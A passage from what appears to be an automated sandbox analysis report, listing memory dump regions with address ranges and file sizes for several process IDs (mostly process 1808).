                                                                                                                                            Filesize

                                                                                                                                            148KB

                                                                                                                                          • memory/744-5001-0x0000025D2A2C0000-0x0000025D2A2E5000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            148KB

                                                                                                                                          • memory/956-4974-0x00007FFD9980C000-0x00007FFD9980D000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/1808-20-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-4885-0x0000000074BA0000-0x0000000075350000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            7.7MB

                                                                                                                                          • memory/1808-52-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-66-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-46-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-38-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-36-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-34-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-32-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-30-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-48-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-44-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-42-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-40-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-28-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-26-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-24-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-22-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-58-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-18-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-16-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-14-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-12-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-8-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-10-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-6-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-5-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-56-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-4888-0x0000000006AC0000-0x0000000006B0C000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            304KB

                                                                                                                                          • memory/1808-4887-0x00000000069D0000-0x0000000006A4E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            504KB

                                                                                                                                          • memory/1808-4886-0x0000000074BA0000-0x0000000075350000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            7.7MB

                                                                                                                                          • memory/1808-4889-0x0000000074BAE000-0x0000000074BAF000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/1808-4890-0x0000000074BA0000-0x0000000075350000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            7.7MB

                                                                                                                                          • memory/1808-0-0x0000000074BAE000-0x0000000074BAF000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/1808-1-0x0000000000470000-0x00000000008F6000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4.5MB

                                                                                                                                          • memory/1808-2-0x0000000006540000-0x0000000006780000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-4-0x0000000006820000-0x00000000068B2000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            584KB

                                                                                                                                          • memory/1808-3-0x0000000006D30000-0x00000000072D4000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            5.6MB

                                                                                                                                          • memory/1808-50-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-54-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-5757-0x0000000074BA0000-0x0000000075350000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            7.7MB

                                                                                                                                          • memory/1808-5734-0x0000000005360000-0x00000000053B4000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            336KB

                                                                                                                                          • memory/1808-60-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-62-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-64-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/1808-68-0x0000000006540000-0x000000000677A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/2028-4898-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            172KB

                                                                                                                                          • memory/3292-4945-0x00007FFD7A640000-0x00007FFD7B101000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            10.8MB

                                                                                                                                          • memory/3292-4916-0x00007FFD7A640000-0x00007FFD7B101000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            10.8MB

                                                                                                                                          • memory/3292-4913-0x000001EEEB130000-0x000001EEEB15A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            168KB

                                                                                                                                          • memory/3292-4912-0x00007FFD7A640000-0x00007FFD7B101000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            10.8MB

                                                                                                                                          • memory/3292-4911-0x00007FFD7A640000-0x00007FFD7B101000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            10.8MB

                                                                                                                                          • memory/3292-4910-0x00007FFD7A640000-0x00007FFD7B101000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            10.8MB

                                                                                                                                          • memory/3292-4909-0x000001EED08E0000-0x000001EED0902000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            136KB

                                                                                                                                          • memory/3292-4899-0x00007FFD7A643000-0x00007FFD7A645000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            8KB